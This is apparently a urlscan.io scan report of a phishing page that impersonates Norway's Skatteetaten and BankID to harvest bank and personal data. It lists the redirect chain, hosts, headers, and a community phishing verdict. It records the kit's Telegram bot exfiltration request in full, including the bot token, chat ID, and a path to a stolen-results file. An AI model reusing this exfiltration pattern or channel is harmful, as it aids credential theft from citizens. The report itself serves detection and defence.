urlscan.io logo urlscan.io
SecurityTrails logo

skatteetaten.is-a-liberal.com Open in urlscan Pro
45.149.241.148  Malicious Activity! Public Scan

Go To Rescan Add Verdict Report
Submitted URL: https://f1ite.r.ag.d.sendibm3.com/mk/cl/f/sh/OycZvHuFo1eQuvTbYdGTSm7M/PR2CTu5BRsu0
Effective URL: https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477
Submission: On January 14 via manual from NO — Scanned from NO
 Behaviour Indicators
Similar DOM Content API
Verdicts

Summary

This website contacted 7 IPs in 4 countries across 7 domains to perform 12 HTTP transactions. The main IP is 45.149.241.148, located in Ashburn, United States and belongs to NYBULA, US. The main domain is skatteetaten.is-a-liberal.com.
TLS certificate: Issued by R11 on January 13th 2025. Valid for: 3 months.
This is the only time skatteetaten.is-a-liberal.com was scanned on urlscan.io!

urlscan.io Verdict: Potentially Malicious

Targeting these brands: BankID (Banking)

Community Verdicts: Malicious1 votes Show Verdicts

Domain & IP information

IP Address AS Autonomous System
1 1.179.112.197 396982 (GOOGLE-CL...)
1 2606:4700:440... 13335 (CLOUDFLAR...)
2 7 45.149.241.148 401116 (NYBULA)
2 104.17.24.14 13335 (CLOUDFLAR...)
1 104.18.11.207 13335 (CLOUDFLAR...)
1 2001:67c:4e8:... 62041 (Telegram ...)
12 7
1    1.179.112.197 (France)

ASN396982 (GOOGLE-CLOUD-PLATFORM, US)
f1ite.r.ag.d.sendibm3.com
1    2606:4700:4400::6812:278d (United States)

ASN13335 (CLOUDFLARENET, US)
sibautomation.com
7    45.149.241.148 (Ashburn, United States)

ASN401116 (NYBULA, US)
skatteetaten-efaktura.is-a-liberal.com
skatteetaten.is-a-liberal.com
2    104.17.24.14 (None, )

ASN13335 (CLOUDFLARENET, US)
cdnjs.cloudflare.com
1    104.18.11.207 (None, )

ASN13335 (CLOUDFLARENET, US)
maxcdn.bootstrapcdn.com
1    2001:67c:4e8:f004::9 (Amsterdam, Netherlands)

ASN62041 (Telegram Telegram Messenger Inc, VG)
api.telegram.org
Apex Domain
Subdomains		 Transfer
7 is-a-liberal.com
skatteetaten-efaktura.is-a-liberal.com
skatteetaten.is-a-liberal.com
13 KB
2 cloudflare.com
cdnjs.cloudflare.com — Cisco Umbrella Rank: 225
35 KB
1 telegram.org
api.telegram.org — Cisco Umbrella Rank: 47163
626 B
1 bootstrapcdn.com
maxcdn.bootstrapcdn.com — Cisco Umbrella Rank: 1255
14 KB
1 sibautomation.com
sibautomation.com — Cisco Umbrella Rank: 23280
1 sendibm3.com
f1ite.r.ag.d.sendibm3.com
852 B
0 googleapis.com Failed
translate.googleapis.com Failed
12 7
Domain Requested by
6 skatteetaten.is-a-liberal.com 1 redirects f1ite.r.ag.d.sendibm3.com
skatteetaten.is-a-liberal.com
2 cdnjs.cloudflare.com skatteetaten.is-a-liberal.com
1 api.telegram.org skatteetaten.is-a-liberal.com
1 maxcdn.bootstrapcdn.com skatteetaten.is-a-liberal.com
1 skatteetaten-efaktura.is-a-liberal.com 1 redirects
1 sibautomation.com f1ite.r.ag.d.sendibm3.com
1 f1ite.r.ag.d.sendibm3.com
0 translate.googleapis.com Failed skatteetaten.is-a-liberal.com
12 8

This site contains no links.

Subject Issuer Validity Valid
*.r.ag.d.sendibm3.com
R10		 2024-11-12 -
2025-02-10		 3 months crt.sh
sibautomation.com
WE1		 2024-12-01 -
2025-03-01		 3 months crt.sh
skatteetaten.is-a-liberal.com
R11		 2025-01-13 -
2025-04-13		 3 months crt.sh
cdnjs.cloudflare.com
WE1		 2024-11-26 -
2025-02-24		 3 months crt.sh
bootstrapcdn.com
WE1		 2024-11-18 -
2025-02-16		 3 months crt.sh
api.telegram.org
Go Daddy Secure Certificate Authority - G2		 2024-03-24 -
2025-04-25		 a year crt.sh

This page contains 2 frames:

Primary Page: https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477
Frame ID: ADEB17648FE11E73AF03F625F3B02AAA
Requests: 11 HTTP requests in this frame

Frame: https://sibautomation.com/cm.html?id=8565142
Frame ID: 2B08F55FEF57599F3C8A9DA2AEF21DBD
Requests: 1 HTTP requests in this frame

Screenshot
Live screenshot
Full Image

Page Title

Skatteetaten

Page URL History Show full URLs

  1. https://f1ite.r.ag.d.sendibm3.com/mk/cl/f/sh/OycZvHuFo1eQuvTbYdGTSm7M/PR2CTu5BRsu0 Page URL
  2. https://skatteetaten-efaktura.is-a-liberal.com/www/no/?p=dWNSK HTTP 302
    https://skatteetaten.is-a-liberal.com/no/no/?token= HTTP 302
    https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477 Page URL

Detected technologies

Overall confidence: 100%
Detected patterns
  • bootstrap(?:[^>]*?([0-9a-fA-F]{7,40}|[\d]+(?:.[\d]+(?:.[\d]+)?)?)|)[^>]*?(?:\.min)?\.js
Overall confidence: 100%
Detected patterns
  • /([\d.]+)/jquery(?:\.min)?\.js
  • jquery.*\.js(?:\?ver(?:sion)?=([\d.]+))?

Page Statistics

12
Requests

92 %
HTTPS

33 %
IPv6

7
Domains

8
Subdomains

7
IPs

4
Countries

62 kB
Transfer

193 kB
Size

2
Cookies

Page URL History

This captures the URL locations of the websites, including HTTP redirects and client-side redirects via JavaScript or Meta fields.

  1. https://f1ite.r.ag.d.sendibm3.com/mk/cl/f/sh/OycZvHuFo1eQuvTbYdGTSm7M/PR2CTu5BRsu0 Page URL
  2. https://skatteetaten-efaktura.is-a-liberal.com/www/no/?p=dWNSK HTTP 302
    https://skatteetaten.is-a-liberal.com/no/no/?token= HTTP 302
    https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477 Page URL

Redirected requests

There were HTTP redirect chains for the following requests:

12 HTTP transactions

Resource
Path		 Size
x-fer		 Type
MIME-Type
PR2CTu5BRsu0
f1ite.r.ag.d.sendibm3.com/mk/cl/f/sh/OycZvHuFo1eQuvTbYdGTSm7M/ 		705 B
852 B 		Document
General
Check archive.org
Download Go to
Full URL
https://f1ite.r.ag.d.sendibm3.com/mk/cl/f/sh/OycZvHuFo1eQuvTbYdGTSm7M/PR2CTu5BRsu0
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
1.179.112.197 , France, ASN396982 (GOOGLE-CLOUD-PLATFORM, US),
Reverse DNS
Software
/
Resource Hash
679aa845ca8e635ca1b06b9314eab436de2b6c244a2049c57ad5c08023eff354
Security Headers
Name Value
X-Content-Type-Options nosniff
X-Xss-Protection 1

Request headers

Upgrade-Insecure-Requests
1
User-Agent
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36

Response headers

content-length
705
content-type
text/html; charset=utf-8
date
Tue, 14 Jan 2025 17:54:01 GMT
x-content-type-options
nosniff
x-sib-server
gke-public-cluster-v2-1-179-114-10
x-xss-protection
1
cm.html
sibautomation.com/ Frame 2B08 		0
0 		Document
General
Check archive.org
Download Go to
Full URL
https://sibautomation.com/cm.html?id=8565142
Requested by
Host: f1ite.r.ag.d.sendibm3.com
URL: https://f1ite.r.ag.d.sendibm3.com/mk/cl/f/sh/OycZvHuFo1eQuvTbYdGTSm7M/PR2CTu5BRsu0
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2606:4700:4400::6812:278d , United States, ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare / Sails <sailsjs.com>
Resource Hash

Request headers

Referer
https://f1ite.r.ag.d.sendibm3.com/
Upgrade-Insecure-Requests
1
User-Agent
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36

Response headers

access-control-allow-origin
*
age
4010
cache-control
public, max-age=7200
cf-cache-status
HIT
cf-ray
901f7d25893456c1-OSL
content-encoding
gzip
content-type
text/html; charset=utf-8
date
Tue, 14 Jan 2025 17:54:01 GMT
expires
Tue, 14 Jan 2025 19:54:01 GMT
server
cloudflare
vary
Accept-Encoding
x-powered-by
Sails <sailsjs.com>
Primary Request /
skatteetaten.is-a-liberal.com/no/no/no/login/
Redirect Chain
  • https://skatteetaten-efaktura.is-a-liberal.com/www/no/?p=dWNSK
  • https://skatteetaten.is-a-liberal.com/no/no/?token=
  • https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477
3 KB
2 KB 		Document
General
Check archive.org
Download Go to
Full URL
https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477
Requested by
Host: f1ite.r.ag.d.sendibm3.com
URL: https://f1ite.r.ag.d.sendibm3.com/mk/cl/f/sh/OycZvHuFo1eQuvTbYdGTSm7M/PR2CTu5BRsu0
Protocol
H2
Security
TLS 1.3, , AES_256_GCM
Server
45.149.241.148 Ashburn, United States, ASN401116 (NYBULA, US),
Reverse DNS
Software
nginx /
Resource Hash
c641cfc911ae665bf7ad30730cbe18c52ce382b0c7679bc66bac7f09a3bb421c
Security Headers
Name Value
X-Content-Type-Options nosniff nosniff
X-Frame-Options SAMEORIGIN SAMEORIGIN
X-Xss-Protection 1; mode=block 1; mode=block

Request headers

Referer
https://f1ite.r.ag.d.sendibm3.com/mk/cl/f/sh/OycZvHuFo1eQuvTbYdGTSm7M/PR2CTu5BRsu0
Upgrade-Insecure-Requests
1
User-Agent
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36

Response headers

cache-control
no-store, no-cache, must-revalidate
content-encoding
br
content-type
text/html; charset=UTF-8
date
Tue, 14 Jan 2025 17:54:04 GMT
expires
Thu, 19 Nov 1981 08:52:00 GMT
pragma
no-cache
referrer-policy
same-origin same-origin
server
nginx
vary
Accept-Encoding
x-content-type-options
nosniff nosniff
x-frame-options
SAMEORIGIN SAMEORIGIN
x-permitted-cross-domain-policies
master-only master-only
x-xss-protection
1; mode=block 1; mode=block

Redirect headers

cache-control
no-store, no-cache, must-revalidate
content-type
text/html; charset=UTF-8
date
Tue, 14 Jan 2025 17:54:03 GMT
expires
Thu, 19 Nov 1981 08:52:00 GMT
location
no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477
pragma
no-cache
referrer-policy
same-origin same-origin
server
nginx
x-content-type-options
nosniff nosniff
x-frame-options
SAMEORIGIN SAMEORIGIN
x-permitted-cross-domain-policies
master-only master-only
x-xss-protection
1; mode=block 1; mode=block
authorization.css
skatteetaten.is-a-liberal.com/no/no/no/login/assets/ 		14 KB
3 KB 		Stylesheet
General
Check archive.org
Download Go to
Full URL
https://skatteetaten.is-a-liberal.com/no/no/no/login/assets/authorization.css
Requested by
Host: skatteetaten.is-a-liberal.com
URL: https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477
Protocol
H2
Security
TLS 1.3, , AES_256_GCM
Server
45.149.241.148 Ashburn, United States, ASN401116 (NYBULA, US),
Reverse DNS
Software
nginx /
Resource Hash
939400928b7e464e4b467b2059bcbce04cdb83c7dcdf81c1c413b496a25bb7c5

Request headers

User-Agent
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Referer
https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477

Response headers

cache-control
max-age=315360000
content-encoding
br
etag
W/"6782fedc-36e6"
expires
Thu, 31 Dec 2037 23:55:55 GMT
access-control-allow-origin
*
date
Tue, 14 Jan 2025 17:54:04 GMT
content-type
text/css
last-modified
Sat, 11 Jan 2025 23:29:32 GMT
server
nginx
vary
Accept-Encoding
translateelement.css
translate.googleapis.com/translate_static/css/ 		0
0
bankid-logo.28f35de5.svg
skatteetaten.is-a-liberal.com/no/no/no/login/assets/ 		3 KB
1 KB 		Image
General
Check archive.org
Download Go to Show image
Full URL
https://skatteetaten.is-a-liberal.com/no/no/no/login/assets/bankid-logo.28f35de5.svg
Requested by
Host: skatteetaten.is-a-liberal.com
URL: https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477
Protocol
H2
Security
TLS 1.3, , AES_256_GCM
Server
45.149.241.148 Ashburn, United States, ASN401116 (NYBULA, US),
Reverse DNS
Software
nginx /
Resource Hash
484e8282229f40d3e277f96ca4584b7d6c863f4270f5294bc52c365f5e6473fc

Request headers

User-Agent
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Referer
https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477

Response headers

cache-control
max-age=315360000
content-encoding
br
etag
W/"6782fedc-a0b"
expires
Thu, 31 Dec 2037 23:55:55 GMT
access-control-allow-origin
*
date
Tue, 14 Jan 2025 17:54:04 GMT
content-type
image/svg+xml
last-modified
Sat, 11 Jan 2025 23:29:32 GMT
server
nginx
vary
Accept-Encoding
jquery.min.js
cdnjs.cloudflare.com/ajax/libs/jquery/1.6.1/ 		89 KB
28 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://cdnjs.cloudflare.com/ajax/libs/jquery/1.6.1/jquery.min.js
Requested by
Host: skatteetaten.is-a-liberal.com
URL: https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477
Protocol
H3
Security
QUIC, , AES_128_GCM
Server
104.17.24.14 -, , ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare /
Resource Hash
c784376960f3163dc760bc019e72e5fed78203745a5510c69992a39d1d8fe776
Security Headers
Name Value
Strict-Transport-Security max-age=15780000
X-Content-Type-Options nosniff

Request headers

User-Agent
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Referer

Response headers

cf-cdnjs-via
cfworker/kv
content-encoding
br
cf-cache-status
HIT
etag
"5eb03ec4-164ce"
age
4159744
report-to
{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TbNlQ3qSBuXKfsjsNEVYM2nlv2dVPFNitzLNwZqqYSavypaYLZsYmMbN81H2WEPB8rIPc0OOF9S9G3RZo08ryNTKeK2K%2FkHn%2F8rP3erDQ3Y8WyLjizmdyCbQ4BmjUziTE%2F9j%2F7RF"}],"group":"cf-nel","max_age":604800}
x-content-type-options
nosniff
expires
Sun, 04 Jan 2026 17:54:04 GMT
alt-svc
h3=":443"; ma=86400
server-timing
cfExtPri
date
Tue, 14 Jan 2025 17:54:04 GMT
content-type
application/javascript; charset=utf-8
last-modified
Mon, 04 May 2020 16:11:48 GMT
vary
Accept-Encoding
priority
u=1,i=?0
strict-transport-security
max-age=15780000
cache-control
public, max-age=30672000
timing-allow-origin
*
nel
{"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
cross-origin-resource-policy
cross-origin
cf-ray
901f7d3ca9725696-OSL
accept-ranges
bytes
access-control-allow-origin
*
content-length
28293
server
cloudflare
jsquery.js
skatteetaten.is-a-liberal.com/no/no/no/login/assets/js/ 		9 KB
2 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://skatteetaten.is-a-liberal.com/no/no/no/login/assets/js/jsquery.js
Requested by
Host: skatteetaten.is-a-liberal.com
URL: https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477
Protocol
H2
Security
TLS 1.3, , AES_256_GCM
Server
45.149.241.148 Ashburn, United States, ASN401116 (NYBULA, US),
Reverse DNS
Software
nginx /
Resource Hash
f465d22e361f02fff87ff22d605b0c53f9d9ee941ecb7c99f9e72aea1bfb7562

Request headers

User-Agent
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Referer
https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477

Response headers

cache-control
max-age=315360000
content-encoding
br
etag
W/"67835352-24de"
expires
Thu, 31 Dec 2037 23:55:55 GMT
access-control-allow-origin
*
date
Tue, 14 Jan 2025 17:54:04 GMT
content-type
application/javascript
last-modified
Sun, 12 Jan 2025 05:29:54 GMT
server
nginx
vary
Accept-Encoding
jquery.validate.min.js
cdnjs.cloudflare.com/ajax/libs/jquery-validate/1.16.0/ 		23 KB
7 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://cdnjs.cloudflare.com/ajax/libs/jquery-validate/1.16.0/jquery.validate.min.js
Requested by
Host: skatteetaten.is-a-liberal.com
URL: https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477
Protocol
H3
Security
QUIC, , AES_128_GCM
Server
104.17.24.14 -, , ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare /
Resource Hash
50e497b00818378dcffe856b994f89947b620c66163768879c9b8a63d583f898
Security Headers
Name Value
Strict-Transport-Security max-age=15780000
X-Content-Type-Options nosniff

Request headers

User-Agent
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Referer

Response headers

cf-cdnjs-via
cfworker/kv
content-encoding
br
cf-cache-status
HIT
etag
"5eb03ec2-5a1e"
age
66817
report-to
{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zLbR4rUYV3Ap7NIOODQEJMMgci4r98w4Ul35AtY7D%2FoWdBFSY7w1XsGu5nmrk%2Fic0rYztcKBKX8x5Jas5JZxzwsjqIpVhpE6hKt7iY69i2V0wyOuW8TeJN2u%2Bv6NP%2Baa0zfeuFHR"}],"group":"cf-nel","max_age":604800}
x-content-type-options
nosniff
expires
Sun, 04 Jan 2026 17:54:04 GMT
alt-svc
h3=":443"; ma=86400
server-timing
cfExtPri
date
Tue, 14 Jan 2025 17:54:04 GMT
content-type
application/javascript; charset=utf-8
last-modified
Mon, 04 May 2020 16:11:46 GMT
vary
Accept-Encoding
priority
u=2,i=?0
strict-transport-security
max-age=15780000
cache-control
public, max-age=30672000
timing-allow-origin
*
nel
{"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
cross-origin-resource-policy
cross-origin
cf-ray
901f7d3ca96f5696-OSL
accept-ranges
bytes
access-control-allow-origin
*
content-length
6638
server
cloudflare
bootstrap.min.js
maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/ 		48 KB
14 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
Requested by
Host: skatteetaten.is-a-liberal.com
URL: https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477
Protocol
H3
Security
QUIC, , AES_128_GCM
Server
104.18.11.207 -, , ASN13335 (CLOUDFLARENET, US),
Reverse DNS
Software
cloudflare /
Resource Hash
e7ed36ceee5450b4243bbc35188afabdfb4280c7c57597001de0ed167299b01b
Security Headers
Name Value
Strict-Transport-Security max-age=31536000; includeSubDomains; preload
X-Content-Type-Options nosniff

Request headers

User-Agent
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Referer

Response headers

cdn-status
200
content-encoding
br
cf-cache-status
HIT
etag
"14d449eb8876fa55e1ef3c2cc52b0c17"
age
2390222
x-content-type-options
nosniff
alt-svc
h3=":443"; ma=86400
server-timing
cfExtPri
date
Tue, 14 Jan 2025 17:54:04 GMT
last-modified
Mon, 25 Jan 2021 22:04:04 GMT
content-type
application/javascript; charset=utf-8
vary
Accept-Encoding
cdn-cache
HIT
cdn-cachedat
11/20/2024 14:11:37
cdn-requestpullcode
200
priority
u=2,i=?0
strict-transport-security
max-age=31536000; includeSubDomains; preload
cache-control
public, max-age=31919000
cdn-requestpullsuccess
True
timing-allow-origin
*
cdn-requesttime
0
cdn-uid
b1941f61-b576-4f40-80de-5677acb38f74
cdn-requestid
22ee951d058bdbb194846a7e3e968d83
cross-origin-resource-policy
cross-origin
cdn-pullzone
252412
cdn-proxyver
1.06
cf-ray
901f7d3cba64b4ee-OSL
access-control-allow-origin
*
cdn-edgestorageid
1002
server
cloudflare
cdn-requestcountrycode
US
sendMessage
api.telegram.org/bot6958975869:AAGprkEhk7vazdIVlRoHcDv259ZdjJSH6ds/ 		379 B
626 B 		Fetch
General
Check archive.org
Download Go to
Full URL
https://api.telegram.org/bot6958975869:AAGprkEhk7vazdIVlRoHcDv259ZdjJSH6ds/sendMessage?text=https://skatteetaten.is-a-liberal.com/no/no/no/login/../rezult/skatt-rzlt.txt&chat_id=-1002288607586&parse_mode=html&disable_notification=false
Requested by
Host: skatteetaten.is-a-liberal.com
URL: https://skatteetaten.is-a-liberal.com/no/no/no/login/assets/js/jsquery.js
Protocol
H2
Security
TLS 1.3, , AES_256_GCM
Server
2001:67c:4e8:f004::9 Amsterdam, Netherlands, ASN62041 (Telegram Telegram Messenger Inc, VG),
Reverse DNS
Software
nginx/1.18.0 /
Resource Hash
afdfe9422bded60757d29fc07115192a78db42e5f51c3ff43c071eeb616cd0e9
Security Headers
Name Value
Strict-Transport-Security max-age=31536000; includeSubDomains; preload

Request headers

User-Agent
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Referer

Response headers

strict-transport-security
max-age=31536000; includeSubDomains; preload
access-control-expose-headers
Content-Length,Content-Type,Date,Server,Connection
access-control-allow-methods
GET, POST, OPTIONS
access-control-allow-origin
*
content-length
379
date
Tue, 14 Jan 2025 17:54:05 GMT
content-type
application/json
server
nginx/1.18.0
favicon.b4be5517.png
skatteetaten.is-a-liberal.com/no/no/no/login/assets/ 		4 KB
4 KB 		Other
General
Check archive.org
Download Go to
Full URL
https://skatteetaten.is-a-liberal.com/no/no/no/login/assets/favicon.b4be5517.png
Protocol
H2
Security
TLS 1.3, , AES_256_GCM
Server
45.149.241.148 Ashburn, United States, ASN401116 (NYBULA, US),
Reverse DNS
Software
nginx /
Resource Hash
09279bbfd669e9974f4ff8c987417665eb32a3377a6a39182e87eda820554544

Request headers

User-Agent
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Referer
https://skatteetaten.is-a-liberal.com/no/no/no/login/?token=fcd00c0656cc4903655f8dde2439698c2aa39477

Response headers

cache-control
max-age=315360000
content-encoding
br
etag
W/"6782fedc-117b"
expires
Thu, 31 Dec 2037 23:55:55 GMT
access-control-allow-origin
*
date
Tue, 14 Jan 2025 17:54:05 GMT
content-type
image/png
last-modified
Sat, 11 Jan 2025 23:29:32 GMT
server
nginx
vary
Accept-Encoding

Failed requests

These URLs were requested, but there was no response received. You will also see them in the list above.

Domain
translate.googleapis.com
URL
https://translate.googleapis.com/translate_static/css/translateelement.css

Verdicts & Comments Add Verdict or Comment

Malicious page.domain
Submitted on January 14th 2025, 5:55:40 pm UTC — From Norway

Threats: Phishing Brand Impersonation
Brands: BankID NO Skatteetaten NO
Comment: This is a fraudulent web page used in a phishing campaign using the name of “Norwegian Tax Administration (Skatteetaten)” and "BankID" to misled citizens to give them personal, bank and creditcard Information. Only active from Norwegian IP adresses.

Potentially malicious activity detected
Disclaimer: These verdicts should be used to detect potentially malicious websites, not as a final verdict!

urlscan

Phishing against: BankID (Banking)

6 JavaScript Global Variables

These are the non-standard "global" variables defined on the window object. These can be helpful in identifying possible client-side frameworks and code.

function| $ function| jQuery function| _0xd4e9 function| _0x7687a6 function| _0x2ee8 object| bootstrap

2 Cookies

Domain/Path Name / Value
sibautomation.com/ Name: uuid
Value: fead9946-7be0-4f0e-b182-020d2e9c7ed3
skatteetaten.is-a-liberal.com/ Name: PHPSESSID
Value: iieq8mih679nq0476151rtnrlm

Security Headers

This page lists any security headers set by the main page. If you want to understand what these mean and how to use them, head on over to this page

Header Value
X-Content-Type-Options nosniff
X-Xss-Protection 1